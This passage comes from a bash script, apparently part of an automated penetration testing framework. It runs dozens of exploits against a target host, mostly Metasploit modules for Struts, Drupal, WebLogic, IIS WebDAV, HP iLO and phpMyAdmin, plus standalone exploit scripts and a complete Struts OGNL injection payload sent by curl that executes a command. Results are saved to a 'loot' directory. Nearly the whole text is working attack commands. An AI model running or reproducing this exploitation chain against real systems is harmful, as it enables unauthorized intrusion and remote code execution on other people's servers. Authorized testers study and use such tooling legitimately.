echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; set PATH /uploads/; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u https://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u https://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET:$PORT | head -n 1
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2018-11776 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache-struts-CVE-2018-11776.py -u https://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
ruby $INSTALL_DIR/bin/drupalgeddon2.rb https://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/cisco-asa-traversal.py https://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET:$PORT
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/gpon_rce.py https://$TARGET:$PORT 'whoami'
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u https://$TARGET:$PORT
|
||||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ] && [ $OSINT == "1" ];
|
||||
then
|
||||
if [ -z $GHDB ];
|
||||
then
|
||||
if [ $OSINT == "0" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SKIPPING GOOGLE HACKING QUERIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
goohak $TARGET > /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
|
||||
rm -Rf output/ cookie.txt exploits.conf
|
||||
fi
|
||||
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
